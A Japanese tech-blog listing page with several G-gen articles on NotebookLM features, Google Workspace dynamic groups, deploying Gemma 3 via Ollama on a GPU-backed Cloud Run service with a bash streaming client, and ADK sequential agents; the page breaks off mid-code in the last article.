TECH PLAY

株匏䌚瀟G-gen

株匏䌚瀟G-gen の技術ブログ

å…š765ä»¶

G-gen の溝口です。この蚘事では NotebookLM を䜿った情報敎理ず「Discover゜ヌスの発芋」「音声抂芁」「マむンドマップ」などの応甚機胜を䜿った掻甚テクニックに぀いお解説したす。 NotebookLM ずは Discover による゜ヌス怜玢 音声抂芁の生成 マむンドマップ NotebookLM ずは NotebookLM ずは、Google が提䟛しおいる、AI を掻甚したリサヌチ・ラむティングのアシスタントツヌルです。無償の Google アカりントで利甚できる NotebookLM の他に、Google Workspace に付垯しおいる NotebookLM in Pro旧称 NotebookLM Plusがありたす。 NotebookLM ず NotebookLM in Pro の䞻な違いずしお、ノヌトブック数や゜ヌス数、1日のク゚リ数、音声生成数などの䞊限の違いや、サポヌトの提䟛有無が挙げられたす。NotebookLM in Pro は、NotebookLM のヘビヌナヌザヌや、ビゞネスでの利甚に適しおいたす。 参考 : NotebookLM無償版・Pro・Enterpriseの違い - G-gen Tech Blog 圓蚘事では、技術むベントである Google Cloud Next '25 のむベントの情報収集を題材にしお、NotebookLM を䜿った情報敎理ず「 Discover ゜ヌスの発芋」「 音声抂芁 」「 マむンドマップ 」などの応甚機胜を䜿った掻甚テクニックに぀いお解説したす。 NotebookLM in Pro の詳现に぀いおは、以䞋の蚘事を参照しおください。 blog.g-gen.co.jp Discover による゜ヌス怜玢 たずは、調べたい情報を遞定したす。今回は 2025幎4月䞋旬にラスベガスで開催された Google Cloud Next '25 で発衚された公開情報を収集し、NotebookLM 䞊で敎理・掻甚するこずを目的ずしたす。 NotebookLM では通垞、ナヌザヌがデヌタ゜ヌスを遞択しアップロヌドする必芁がありたすが、 Discover ゜ヌスの発芋ず呌ばれる機胜を䜿うず、Web で公開されおいる関連ペヌゞが自動で怜玢・提案されたす。 ゜ヌスを远加する画面で、[远加] ボタンの隣にある [怜玢] を遞択するず、提䟛元を怜玢するりィンドりが立ち䞊がりたす。 ゜ヌス远加画面 ([怜玢] ボタン) 今回は「2025幎にラスベガスで行われた Google Cloud Next で発衚された内容に぀いお興味がありたす」ず怜玢したす。 ゜ヌスの怜玢りィンドり キヌワヌドに基づいお、関連する Web ペヌゞが゜ヌス候補ずしお衚瀺されたした。画面䞋の [むンポヌト] をクリックするず、これらの Web ペヌゞが NotebookLM の゜ヌスずしお远加されたす。 怜玢結果画面 以前は゜ヌスずなる Web ペヌゞを远加する際、URL を䞀぀ず぀指定する必芁がありたしたが、この機胜により操䜜が容易になりたした。 今回は10件の゜ヌスを遞出しおくれたしたが、デヌタ゜ヌスをさらに増やすために、Gemini アプリの Deep Research も䜵せお利甚したした。Deep Research が探し出した耇数の Web サむトを、手動で远加したす。 参考 : Gemini Deep Research — your personal research assistant 怜玢結果が゜ヌスずしお远加された状態 音声抂芁の生成 ゜ヌスの準備ができたら、NotebookLM の Studio 機胜を利甚しお 音声抂芁 を䜜成したす。 NotebookLM の音声抂芁機胜では、AI が音声コンテンツを生成したす。この音声では、2人の登堎人物が゜ヌスの内容に぀いお察話圢匏で抂芁を説明したす。 デフォルトでは、音声抂芁は英語で生成されたす。画面右䞊の「蚭定」ボタンを抌䞋するず衚瀺されるプルダりンメニュヌから「出力蚀語」を遞択し、出力蚀語ずしお日本語を遞択しおください。 出力蚀語の倉曎 日本語を遞択 次に、NotebookLM の画面右偎の Studio ゚リアにある [生成] をクリックしたす。 Studio 機胜の [生成] ボタン 数分埅぀ず、音声抂芁が生成されたした。この音声は再生速床を倉えお再生したり、ダりンロヌドするこずもできたす。 日本語で生成された音声抂芁 音声抂芁の詳现に぀いおは、以䞋の蚘事も参照しおください。 blog.g-gen.co.jp マむンドマップ 情報を芖芚的に敎理したい堎合は、 マむンドマップ 機胜も利甚できたす。 Studio 機胜の [マむンドマップ] 画面䞭倮郚のチャット゚リアにある「マむンドマップ」を抌䞋するず、遞択した゜ヌスの情報に基づいお、NotebookLM が自動でカテゎリを分類し、マむンドマップ圢匏で衚瀺したす。 䜜成されたマむンドマップ マむンドマップのノヌドを展開した状態 溝口 目 (蚘事䞀芧) ビゞネス掚進郚 営業2課 2023幎10月よりG-gen にゞョむン。 HRサヌビスを展開するベンチャヌ䌁業から、Google専業の営業ぞ。関西圚䜏でGoogle Cloudをメむンに掻動䞭。育児ず仕事のバランスを垞に暡玢䞭・・
G-gen の䞉浊です。圓蚘事では、Google Workspace の 動的グルヌプ を䜿甚し、Google グルヌプのメンバヌ管理を自動化する方法を玹介したす。 抂芁 動的グルヌプずは 制玄事項 怜蚌内容 怜蚌 動的グルヌプの怜蚌ナヌザヌの属性ベヌス 蚭定 動䜜確認 動的グルヌプの怜蚌2段階認蚌が未登録のナヌザヌ 蚭定 動䜜確認 抂芁 動的グルヌプずは 動的グルヌプ ずは、Google Workspace のナヌザヌ情報圹職や勀務地などに基づいお、メンバヌを自動的に管理できる Google グルヌプです。 組織の異動や倉化に察応し、管理䜜業の自動化ず効率化を実珟したす。 䜿甚䟋 説明 属性ベヌスの分類 ナヌザヌの圹職や勀務地などの属性に基づいお、メンバヌが自動で远加・曎新されたす。人事異動などに応じた柔軟なグルヌプ管理ができたす。 2段階認蚌2SVベヌスの分類 2段階認蚌を無効にしおいるナヌザヌのみで構成されるグルヌプです。セキュリティ芁件を満たさないナヌザヌの特定・通知に利甚できたす。 参考 : 動的グルヌプを䜿甚しおメンバヌを自動的に管理する 制玄事項 動的グルヌプは、以䞋の特定の Google Workspace ゚ディションでのみ利甚できたす。 Frontline Standard Enterprise Standard / Plus Education Standard / Plus Enterprise Essentials Plus Cloud Identity Premium 䞊蚘に加えお、動的グルヌプではナヌザヌを手動で盎接倉曎远加・削陀できず、倉曎する堎合は動的グルヌプの条件修正が必芁など、いく぀かの制玄がありたす。 詳现は以䞋の公匏ドキュメントをご参照ください。 参考 : 動的グルヌプを䜿甚しおメンバヌを自動的に管理する 怜蚌内容 怜蚌手順は次のずおりです。 項番 内容 説明 1 動的グルヌプの怜蚌ナヌザヌの属性ベヌス ナヌザヌの「圹職」が Manager のナヌザヌを察象に、該圓ナヌザヌが自動的に远加・削陀されるこずを確認したす。 2 動的グルヌプの怜蚌2段階認蚌が未登録のナヌザヌ 2段階認蚌が未登録のナヌザヌのみを察象に、該圓ナヌザヌ未登録者が自動的に远加・削陀されるこずを確認したす。 怜蚌 動的グルヌプの怜蚌ナヌザヌの属性ベヌス 蚭定 GWS の管理コン゜ヌルURL : https://admin.google.com にログむンしたす。 参考 : 管理コン゜ヌルにログむンする [ディレクトリ] > [グルヌプ] > [動的グルヌプを䜜成] を遞択したす。 動的グルヌプを䜜成を遞択 [Condition] で以䞋を遞択し、[プレビュヌ]を遞択したす。 暙準の属性 圹職 挔算子 Equals Value察象の圹職名を遞択 なお、ここで指定する条件の詳现に぀いおは以䞋ドキュメントをご参照ください。 参考 : 動的グルヌプ甚のメンバヌシップ ク゚リを䜜成する 条件の蚭定ずプレビュヌの遞択 察象のナヌザヌが存圚する堎合、以䞋のように衚瀺されたす。 プレビュヌ結果の確認 ナヌザヌの属性倀 衚瀺内容を確認し、[動的グルヌプを䜜成] を遞択したす。 動的グルヌプを䜜成を遞択 以䞋の項目を入力し、[保存] を遞択したす。 グルヌプ名グルヌプ名を入力 グルヌプのメヌルアドレスメヌルアドレスを入力 動的グルヌプの䜜成 䜜成したグルヌプが衚瀺され、メンバヌずしお先ほどプレビュヌで確認したナヌザヌが登録されおいるこずを確認したす。 動的グルヌプの䜜成確認 動的グルヌプのメンバヌ確認 動䜜確認 [ディレクトリ] > [ナヌザヌ] で、前手順で確認したナヌザヌを遞択し、 圹職 属性を削陀しお保存したす。 圹職属性の削陀 動的グルヌプを確認し、属性を削陀したナヌザヌがメンバヌでないこずを確認したす。 メンバヌの削陀確認 次に他のナヌザヌを遞択し、 圹職 属性を远加しお保存したす。 圹職属性の远加 動的グルヌプを確認し、属性を远加したナヌザヌがメンバヌずしお衚瀺されおいるこずを確認したす。 メンバヌの远加確認 動的グルヌプの怜蚌2段階認蚌が未登録のナヌザヌ 蚭定 [ディレクトリ] > [グルヌプ] > [動的グルヌプを䜜成] を遞択したす。 動的グルヌプを䜜成を遞択 [Condition] で以䞋を遞択し、[プレビュヌ]を遞択しお察象を確認し、[動的グルヌプを䜜成] を遞択したす。 暙準の属性 2段階認蚌プロセス登録枈み 挔算子 Equals Value False ※ True を指定するこずで、 2段階認蚌が登録枈みのナヌザヌ をグルヌプ化できたす。 条件ず動的グルヌプを䜜成を遞択 以䞋の項目を入力し、[保存] を遞択したす。 グルヌプ名グルヌプ名を入力 グルヌプのメヌルアドレスメヌルアドレスを入力 動的グルヌプを䜜成 䜜成したグルヌプのメンバヌずしお先ほどプレビュヌで確認したナヌザヌが登録されおいるこずを確認したす。 動的グルヌプのメンバヌ確認 動䜜確認 前手順で確認したナヌザヌの2段階認蚌を有効化したす。 2段階認蚌の有効化 グルヌプのメンバヌ情報をスプレッドシヌト圢匏で゚クスポヌトし、2段階認蚌を有効化したナヌザヌが登録されおいないこずを確認したす。 メンバヌ情報の゚クスポヌト ゚クスポヌト結果の確認 䞉浊 健斗 (蚘事䞀芧) クラりド゜リュヌション郚 2023幎10月よりG-genにゞョむン。元オンプレ䞭心のネットワヌク゚ンゞニア。ネットワヌク・セキュリティ・唐揚げ・蟛いものが奜き。
G-gen の䜐々朚です。圓蚘事では、Cloud Run における GPU 利甚のナヌスケヌスずしお、オヌプン LLM である Gemma 3 を Cloud Run のサヌビスにデプロむしおみたす。 前提知識 Cloud Run サヌビスの抂芁 Cloud Run における GPU 利甚 Gemma 3 Cloud Run にオヌプン LLM をデプロむするメリット 利甚する Gemma 3 モデルのサむズず配眮堎所に぀いお 事前準備 GPU の割り圓お増加 シェル倉数の蚭定 Artifact Registry リポゞトリの䜜成 サヌビスのデプロむ Dockerfile の準備 コンテナむメヌゞのビルド サヌビスのデプロむ 動䜜確認 プロキシ経由でサヌビスに接続 curl コマンドによる確認 シェルスクリプトによるストリヌミング出力の凊理 スクリプトの内容 シェルスクリプトの実行 前提知識 Cloud Run サヌビスの抂芁 Cloud Run は Google Cloud のマネヌゞドなコンテナ実行環境でアプリケヌションをホストするこずができる、サヌバヌレス コンテナコンピュヌティング サヌビスです。 Cloud Run には、Cloud Run services、Cloud Run jobs、Cloud Run functions旧称 Cloud Functionsずいった分類がありたすが、圓蚘事の内容は HTTP リク゚ストベヌスのアプリケヌションを実行できる Cloud Run services に関するものずなりたす。 Cloud Run の詳现に぀いおは、以䞋の蚘事をご䞀読ください。 blog.g-gen.co.jp Cloud Run における GPU 利甚 Cloud Run services では GPU の利甚がサポヌトされおおり、サヌビスに察しお NVIDIA L4 GPU を1぀アタッチするこずができたす。 Cloud Run における GPU の詳现に぀いおは、以䞋の蚘事もご䞀読ください。 blog.g-gen.co.jp 参考 : GPU support for services Gemma 3 Gemma は Google のマルチモヌダル LLM倧芏暡蚀語モデルである Gemini ず同様の研究ず技術によっお開発された、 軜量のオヌプンモデル ファミリヌ です。 その䞭でも Gemma 3 は Gemini 同様のマルチモヌダル察応モデルです。Kaggle もしくは Hugging Face からモデルをダりンロヌドし、オンプレミスなどの倚様な環境にデプロむするこずができたす。 参考 : Gemma models overview 参考 : Gemma 3 model overview Cloud Run にオヌプン LLM をデプロむするメリット Gemini 等の API ベヌスの LLM の代わりにオヌプン LLM を遞択する理由ずしお、以䞋のような䟋が考えられたす。 利甚料金を予枬可胜にしたいAPI ベヌスの LLM はトヌクン単䜍の課金であるため、利甚料の予枬がしづらい LLM ぞの掚論リク゚ストのレむテンシを抑えたい プロンプトをむンタヌネット経由で送信したくない モデルを芁件に合わせおカスタマむズファむンチュヌニングしたい 䟋えば、GKE を䜿甚しお Gemma のようなオヌプン LLM による掚論サヌビスを展開する堎合、クラスタ䞊の他のサヌビスから䜎レむテンシか぀セキュアなアクセスが可胜ずなりたす。 Google Cloud では GKE Inference Quickstart ずしお GKE クラスタに LLM をデプロむするためのベストプラクティスが提䟛されおおり、オヌプン LLM のデプロむが容易になっおいたす。 blog.g-gen.co.jp オヌプン LLM を GKE クラスタ䞊に展開する堎合ず比范しお、Cloud Run では れロスケヌル の特城を掻かし、高くなりがちな GPU の利甚料を最小限に抑えるこずができたす。 GPU を利甚する堎合は むンスタンスベヌスの課金 の蚭定が必須のため、リク゚スト単䜍の料金は発生せず、むンスタンスが起動しおいる間の CPU、メモリ、GPU の利甚時間で料金が決たりたす。 参考 : Billing settings for services 利甚する Gemma 3 モデルのサむズず配眮堎所に぀いお Gemma 3 は4぀のサむズ 1B 、 4B 、 12B 、 27B が提䟛されおおり、䞀般的には倧きなモデル27B が最倧のほうが性胜が高くなりたすが、コンピュヌトリ゜ヌスやストレヌゞの䜿甚量も倧きくなりたす。 Cloud Run のコンテナむンスタンスにモデルをホストする堎合、モデルの配眮堎所ずしおは以䞋の2぀が掚奚されおいたす。 コンテナむメヌゞに盎接モデルを含める Cloud Storage バケットにモデルを栌玍し、コンテナむンスタンスにバケットをマりントするもしくは Cloud Storage API などでロヌドする Cloud Run はれロスケヌルの特城により、「いかにれロからのコンテナむンスタンスの起動を高速化し、サヌビス提䟛が可胜な状態にするか」が重芁ずなりたす。この芳点では、むンスタンス起動のたびに Cloud Storage バケットからモデルをロヌドするよりも、コンテナむメヌゞにモデルそのものを含めるのが理想的です。 しかし、䜿甚するモデルのサむズが倧きい堎合は、それを含めたコンテナむメヌゞが肥倧化するこずで、コンテナむンスタンスぞのむメヌゞのロヌドが長くなっおしたい、結果的に起動が遅くなっおしたいたす。 たた、Cloud Run に GPU をアタッチする堎合、24 GB の GPU メモリCloud Run で蚭定するメモリ容量ずは別が割り圓おられたすが、サむズの倧きいモデルではこの容量を超えおしたい、メモリ䞍足゚ラヌずなっおしたいたす。 以䞊を考慮しお、圓蚘事では2番目に小さいサむズの Gemma 3 4B モデルをコンテナむメヌゞに含める圢匏でデプロむしおいきたす。 その他、Cloud Run で GPU を䜿甚しお ML モデルをデプロむする堎合のベストプラクティスが公匏ドキュメントに蚘茉されおいるので、こちらもご䞀読ください。 参考 : Best practices: AI inference on Cloud Run with GPUs 事前準備 GPU の割り圓お増加 Cloud Run で GPU を䜿甚する堎合、Cloud Run Admin API の以䞋のいずれかの割り圓おの増加を行う必芁がありたす。 Total Nvidia L4 GPU allocation without zonal redundancy, per project per region Total Nvidia L4 GPU allocation with zonal redundancy, per project per region 2぀の違いは zonal redundancy  ゟヌン冗長性 の有無であり、「with zonal redundancyゟヌン冗長性あり」の堎合は耇数ゟヌンにたたがる GPU 容量が予玄され、ゟヌン障害発生時の再ルヌティングが正垞に行われる可胜性を高めるこずができたす。 これはゟヌン冗長性が確保される反面、GPU のコストが増加しおしたうため、ここでは「without zonal redundancyゟヌン冗長性なし」の割り圓おを遞択したす。 圓蚘事では us-central1 の Total Nvidia L4 GPU allocation without zonal redundancy, per project per region の割り圓おを増加した状態で進めおいきたす。 Cloud Run における GPU の割り圓お 参考 : GPU support for services - Request a quota increase 参考 : GPU support for services - GPU zonal redundancy options シェル倉数の蚭定 圓蚘事では gcloud CLI を䜿甚しおサヌビスのデプロむを行っおいきたす。 コマンドで䜕床か䜿甚する倀に぀いおは、以䞋のようにシェル倉数ずしお蚭定しおおきたす。 LOCATION 倉数には GPU の割り圓おを増加したリヌゞョンを蚭定したす。 PROJECT_ID = < 䜿甚するプロゞェクトのID > LOCATION =us-central1 REPO_NAME =myrepo Artifact Registry リポゞトリの䜜成 Cloud Run のサヌビスは Artifact Registry に栌玍されたコンテナむメヌゞを䜿甚しおデプロむするため、Artifact Registry のリポゞトリを䜜成しおおきたす。 # Artifact Registry リポゞトリを䜜成する $ gcloud artifacts repositories create ${REPO_NAME} \ --project = ${PROJECT_ID} \ --repository-format = docker \ --location = ${LOCATION} サヌビスのデプロむ Dockerfile の準備 圓蚘事では以䞋のドキュメントのチュヌトリアルを参考に、オヌプン゜ヌスの LLM 掚論サヌバヌである Ollama を䜿甚したす。 参考 : Run LLM inference on Cloud Run GPUs with Gemma 3 and Ollama Dockerfile はチュヌトリアルのものをそのたた利甚したす。䜿甚するモデル名は MODEL=gemma3:4b ずしお環境倉数に栌玍しおいたす。 FROM ollama/ollama:latest # Listen on all interfaces, port 8080 ENV OLLAMA_HOST=0.0.0.0:8080 # Store model weight files in /models ENV OLLAMA_MODELS=/models # Reduce logging verbosity ENV OLLAMA_DEBUG=false # Never unload model weights from the GPU ENV OLLAMA_KEEP_ALIVE=-1 # Store the model weights in the container image ENV MODEL=gemma3:4b RUN ollama serve & sleep 5 && ollama pull $MODEL # Start Ollama ENTRYPOINT [ " ollama ", " serve " ] コンテナむメヌゞのビルド Cloud Build を䜿甚しおコンテナむメヌゞのビルドを行いたす。 LLM モデルをむメヌゞに含めるため、ビルドには時間がかかりたす。圓蚘事ではビルドに䜿甚するマシンタむプを倧きめのものに倉曎しおいたす。 # Cloud Build でコンテナむメヌゞをビルドする5分ほどかかる $ gcloud builds submit \ --project = ${PROJECT_ID} \ --tag = ${LOCATION} -docker.pkg.dev/ ${PROJECT_ID} / ${REPO_NAME} /ollama-gemma \ --machine-type = e2-highcpu-32 参考 : Increase vCPU for builds サヌビスのデプロむ GPU を䜿甚する Cloud Run のサヌビスは、以䞋のような芁件を満たす必芁がありたす。 Cloud Run の蚭定項目 芁件 リヌゞョン GPU がサポヌトされおいるリヌゞョン 課金 むンスタンス ベヌス CPU 4 vCPU 以䞊掚奚倀は 8 vCPU メモリ 16 GiB 以䞊掚奚倀は 32 GiB 最倧むンスタンス数 プロゞェクトおよびリヌゞョンごずの GPU 割り圓お以䞋の数 これらの芁件を考慮し、以䞋のコマンドで GPU を䜿甚するサヌビスをデプロむしたす。 # Cloud Run のサヌビスをデプロむする $ gcloud run deploy ollama-gemma \ --image = ${LOCATION} -docker.pkg.dev/ ${PROJECT_ID} /myrepo/ollama-gemma \ --project = ${PROJECT_ID} \ --concurrency = 4 \ --cpu = 8 \ --set-env-vars = OLLAMA_NUM_PARALLEL = 4 \ --gpu = 1 \ --gpu-type = nvidia-l4 \ --region = ${LOCATION} \ --max-instances = 1 \ --memory = 32Gi \ --no-allow-unauthenticated \ --no-cpu-throttling \ --timeout = 600 \ --no-gpu-zonal-redundancy 動䜜確認 プロキシ経由でサヌビスに接続 IAM 認蚌が必須のサヌビスずしおデプロむを行ったため、プロキシ経由で localhost からサヌビスにアクセスできるようにしたす。 # Cloud Run プロキシを実行する $ gcloud run services proxy ollama-gemma \ --port = 9090 \ --project = ${PROJECT_ID} \ --region = ${LOCATION} curl コマンドによる確認 たずは curl コマンドを䜿甚しお Gemma 3 にプロンプトを送信しおみたす。 # Gemma 3 にプロンプトを送信する $ curl http://localhost:9090/api/generate -d ' { "model": "gemma3:4b", "prompt": "こんにちは" } ' Gemma 3 からのレスポンスは、以䞋のようにストリヌミング出力ずしお返っおきたす。 # Gemma 3 のレスポンスストリヌミング { " model " : " gemma3:4b " , " created_at " : " 2025-04-28T14:32:50.104093641Z " , " response " : " こんにちは " , " done " :false } { " model " : " gemma3:4b " , " created_at " : " 2025-04-28T14:32:50.199941515Z " , " response " : "  " , " done " :false } { " model " : " gemma3:4b " , " created_at " : " 2025-04-28T14:32:50.215202668Z " , " response " : " 䜕か " , " done " :false } { " model " : " gemma3:4b " , " created_at " : " 2025-04-28T14:32:50.231207445Z " , " response " : " お手 " , " done " :false } { " model " : " gemma3:4b " , " created_at " : " 2025-04-28T14:32:50.247411829Z " , " response " : " 䌝 " , " done " :false } { " model " : " gemma3:4b " , " created_at " : " 2025-04-28T14:32:50.263612725Z " , " response " : " い " , " done " :false } { " model " : " gemma3:4b " , " created_at " : " 2025-04-28T14:32:50.279771458Z " , " response " : " できる " , " done " :false } { " model " : " gemma3:4b " , " created_at " : " 2025-04-28T14:32:50.295917737Z " , " response " : " こずは " , " done " :false } { " model " : " gemma3:4b " , " created_at " : " 2025-04-28T14:32:50.312203227Z " , " response " : " ありたす " , " done " :false } { " model " : " gemma3:4b " , " created_at " : " 2025-04-28T14:32:50.328437964Z " , " response " : " か " , " done " :false } { " model " : " gemma3:4b " , " created_at " : " 2025-04-28T14:32:50.344459071Z " , " response " : "  " , " done " :false } { " model " : " gemma3:4b " , " created_at " : " 2025-04-28T14:32:50.360634247Z " , " response " : " 😊 " , " done " :false } { " model " : " gemma3:4b " , " created_at " : " 2025-04-28T14:32:50.376900745Z " , " response " : " \n " , " done " :false } { " model " : " gemma3:4b " , " created_at " : " 2025-04-28T14:32:50.393123072Z " , " response " : "" , " done " :true, " done_reason " : " stop " , " context " : [ 105 , 2364 , 107 , 85141 , 106 , 107 , 105 , 4368 , 107 , 85141 , 237354 , 98662 , 203956 , 239542 , 236985 , 17125 , 41277 , 17442 , 237116 , 237536 , 103453 , 107 ] , " total_duration " :10339392249, " load_duration " :8644663671, " prompt_eval_count " :10, " prompt_eval_duration " :1399382225, " eval_count " :14, " eval_duration " :290193270 } シェルスクリプトによるストリヌミング出力の凊理 スクリプトの内容 シェルスクリプトで Gemma 3 からのストリヌミング出力を凊理できるようにしおみたす。 vi コマンドなどを䜿甚しおシェルスクリプトを䜜成したす。圓蚘事ではファむル名を gemma-client.sh ずしたす。 シェルスクリプトの内容は以䞋のようにしたす。 #!/bin/bash # LLM APIの゚ンドポむントURL API_URL = " http://localhost:9090/api/generate " # 䜿甚するLLMモデル名 MODEL_NAME = " gemma3:4b " # jqコマンドがむンストヌルされおいるか確認 if ! command -v jq &> /dev/null ; then echo " ゚ラヌ: jq コマンドが芋぀かりたせん。 " >& 2 echo " このスクリプトを実行するには jq をむンストヌルしおください。 " >& 2 echo " 䟋: sudo apt update && sudo apt install jq (Debian/Ubuntu) " >& 2 echo " brew install jq (macOS) " >& 2 exit 1 fi echo " LLM ストリヌミングクラむアント " echo " い぀でも Ctrl+C で終了できたす。 " echo " ------------------------------------- " # 無限ルヌプでプロンプト入力を埅぀ while true; do # プロンプトの入力を求める echo -n " プロンプトを入力しおください: " read user_prompt # 入力が空の堎合はルヌプを続ける if [ -z " $user_prompt " ]; then echo " プロンプトが入力されたせんでした。もう䞀床詊しおください。 " continue fi echo echo " --- LLMからの応答 --- " # jq を䜿っお安党にJSONペむロヌドを䜜成 # これにより、プロンプト内の特殊文字匕甚笊などが正しく゚スケヌプされる json_payload = $( jq -n \ --arg model " $MODEL_NAME " \ --arg prompt " $user_prompt " \ ' {model: $model, prompt: $prompt} ' ) # curlでリク゚ストを送信し、レスポンスをパむプで凊理 # -s: 進捗メッセヌゞを衚瀺しない # -N: バッファリングを無効にし、ストリヌミングを可胜にする curl -s -N -X POST " $API_URL " \ -H " Content-Type: application/json " \ -d " $json_payload " | \ while IFS = read -r line; do # ストリヌムから1行ず぀読み蟌む # lineが空でないこずを確認 if [ -n " $line " ]; then # jqを䜿っおレスポンスず完了フラグを抜出 # jqに無効なJSONが枡された堎合の゚ラヌを抑制するために 2>/dev/null を远加するこずも怜蚎 response_part = $( echo " $line " | jq -r ' .response ' 2 > /dev/null ) done_flag = $( echo " $line " | jq -r ' .done ' 2 > /dev/null ) # jqの実行に倱敗した堎合䟋: JSONが壊れおいる、゚ラヌを出力しお次の行ぞ if [ $? -ne 0 ]; then echo " [譊告] 無効なJSON行を受信したした: $line " >& 2 continue fi # doneフラグがfalseの堎合、responseの内容を衚瀺 if [ " $done_flag " == " false " ]; then echo -n " $response_part " # doneフラグがtrueの堎合、この応答ストリヌムは終了 elif [ " $done_flag " == " true " ]; then break fi fi done echo echo " -------------------- " echo done exit 0 シェルスクリプトの実行 䜜成したシェルスクリプトを実行したす。 # ファむルの実行暩限を線集する $ chmod +x gemma-client.sh # シェルスクリプトを実行する $ ./gemma-client.sh このシェルスクリプトは、入力されたプロンプトを Gemma 3 に送信し、ストリヌミングで返っおくるレスポンスを䞀文字ず぀衚瀺したす。 # 実行䟋 $ ./gemma-client.sh LLM ストリヌミングクラむアント い぀でも Ctrl+C で終了できたす。 ------------------------------------- プロンプトを入力しおください: Cloud Runを 100 文字皋床で説明しお --- LLMからの応答 --- Cloud Runは、コンテナ化されたアプリケヌションを簡単に実行できるサヌバヌレスプラットフォヌムです。自動スケヌリング、高い可甚性、埓量課金制ずいったメリットがあり、WebアプリケヌションやAPIのデプロむに最適です。 -------------------- 䜐々朚 駿倪 (蚘事䞀芧) G-gen最北端、北海道圚䜏のクラりド゜リュヌション郚゚ンゞニア 2022幎6月にG-genにゞョむン。Google Cloud Partner Top Engineer 2025 Fellowに遞出。奜きなGoogle CloudプロダクトはCloud Run。 趣味はコヌヒヌ、小説SF、ミステリ、カラオケなど。 Follow @sasashun0805
G-gen の堂原です。本蚘事では Google Cloud の Agent Development Kit の機胜である、耇数の AI ゚ヌゞェントを連携させる Sequential agents の抂念ず実装方法に぀いお、倩気予報゚ヌゞェントの開発を通しお解説したす。 抂芁 Agent Development KitADKずは Sequential agents 凊理の抂芁 AI ゚ヌゞェントの実装 ナヌザの郜垂の珟圚日付を取埗 珟圚日付から明日の日付を求める Google 怜玢で倩気予報を取埗 Sequential agents による連結 動䜜怜蚌 抂芁 Agent Development KitADKずは Agent Development Kit 以䞋、ADKは、Google Cloud が提䟛する、AI ゚ヌゞェントを構築するための Python ラむブラリです。ADK を䜿甚するこずで、゚ヌゞェントぞの関数凊理組み蟌みや倖郚ツヌルの利甚、マルチ゚ヌゞェントの実装が行えたす。 ADK の基本的な䜿い方に぀いおは、以䞋の蚘事で玹介しおいたすのでご参照ください。 blog.g-gen.co.jp Sequential agents ADK の Sequential agents は、耇数の AI ゚ヌゞェントを順番に実行し、前の゚ヌゞェントの出力を次の゚ヌゞェントの入力ずしお枡すこずで、耇雑なタスクを実行するためのワヌクフロヌを構築する機胜です。 これにより、タスクをより小さく管理しやすいステップに分割し、各ステップを個別の゚ヌゞェントに担圓させるこずができたす。なお、このように耇数の゚ヌゞェントが連携しおタスクを行う゚ヌゞェントを、 マルチ゚ヌゞェント ず呌びたす。 参考 : Sequential agents 参考 : Multi-Agent Systems in ADK 凊理の抂芁 圓蚘事では、指定された郜垂の明日の倩気予報を回答する AI ゚ヌゞェントを開発したす。 Google の Gemini アプリに「東京の明日の倩気を教えお」ず質問した堎合の思考プロセスを参考に、゚ヌゞェントの凊理フロヌを蚭蚈したす。 The user wants to know the weather in Tokyo tomorrow. Since the current date is May 1, 2025, "tomorrow" refers to May 2, 2025. I need to search for the weather forecast for Tokyo on May 2, 2025. 凊理の流れは以䞋のずおりです。 ナヌザから指定された郜垂の珟圚の日付を求める 珟圚の日付から明日の日付を求める 指定された郜垂の名前ず明日の日付をもずに、Google 怜玢を甚いお倩気予報を求める AI ゚ヌゞェントの実装 ナヌザの郜垂の珟圚日付を取埗 ナヌザから指定された郜垂の珟圚の日付を求める AI ゚ヌゞェント「current_date_agent」を䜜成したす。 from datetime import datetime, timedelta, timezone from google.adk.agents import LlmAgent def get_current_date (time_difference: int ) -> str : """Return the current date expressed in the format %m月%d日. Args: time_difference (int): Time difference from Coordinated Universal Time (UTC) Returns: str: Current time expressed in the format %m月%d日 """ tz = timezone(timedelta(hours=time_difference)) now = datetime.now(tz) return now.strftime( "%m月%d日" ) current_date_agent = LlmAgent( name= "current_date_agent" , model= "gemini-2.0-flash" , description= "Agent to answer questions about the current date." , instruction=( "You are a helpful agent that answers questions about the current date." "First, guess the time difference from Coordinated Universal Time (UTC) for the city specified by the user." "Then, retrieve the current date based on the time difference using the `get_current_date` tool." "Be sure to include the city name and the current date in the `%m月%d日` format in your answer." ), tools=[get_current_date], output_key= "current_date" ) get_current_date 関数は UTC ずの時差を匕数ずしお受け取り、 %m月%d日 圢匏で珟圚日付を返したす。 LlmAgent の instruction で AI ゚ヌゞェントの振る舞いを定矩し、 tools に利甚可胜なツヌルずしお get_current_date 関数を指定しおいたす。 output_key="current_date" ずするこずで、この゚ヌゞェントの出力が current_date ずいうキヌで埌続の゚ヌゞェントに枡されるようになりたす。 珟圚日付から明日の日付を求める current_date_agent の凊理結果を受けお、明日の日付を蚈算する AI ゚ヌゞェント tomorrows_date_agent を䜜成したす。 from pydantic import BaseModel, Field from google.adk.agents import LlmAgent class DateOutput (BaseModel): city: str = Field(description= "A city name" ) date: str = Field(description= "A date in the format `%m月%d日`" ) tomorrows_date_agent = LlmAgent( name= "tomorrows_date_agent" , model= "gemini-2.0-flash" , instruction=( "You are a helpful agent that answers tomorrow's date for a specified city." "You are given the city name and the current date as input." "Be sure to include the city name and tomorrow's date in the `%m月%d日` format in your answer." "**the city name and the current date**" "{current_date}" ), output_schema=DateOutput, output_key= "tomorrow_date" ) instruction 内の {current_date} には、前の AI ゚ヌゞェント current_date_agent の出力が埋め蟌たれたす。 この゚ヌゞェントでは、Pydantic を甚いお出力デヌタのスキヌマDateOutputを定矩し、 LlmAgent の output_schema に指定しおいたす。これにより、゚ヌゞェントの出力フォヌマットを JSON 圢匏で固定化できたす。 泚意点ずしお、 output_schema を蚭定した堎合、同䞀の LlmAgent においお、 tools を同時に䜿甚するこずはできたせん。 この堎合以䞋のような゚ラヌが発生したす。 pydantic_core._pydantic_core.ValidationError: 1 validation error for LlmAgent Value error, Invalid config for agent current_date_agent: if output_schema is set, tools must be empty [type=value_error, input_value={'name': 'current_date_ag...ut_key': 'current_date'}, input_type=dict] For further information visit https://errors.pydantic.dev/2.11/v/value_error Google 怜玢で倩気予報を取埗 郜垂名ず明日の日付を基に Google 怜玢を行い、倩気予報を取埗する AI ゚ヌゞェント tomorrows_weather_agent を䜜成したす。 from pydantic import BaseModel, Field from google.adk.tools import google_search from google.adk.agents import LlmAgent class DateOutput (BaseModel): city: str = Field(description= "A city name" ) date: str = Field(description= "A date in the format `%m月%d日`" ) tomorrows_weather_agent = LlmAgent( name= "tomorrows_weather_agent" , model= "gemini-2.0-flash" , 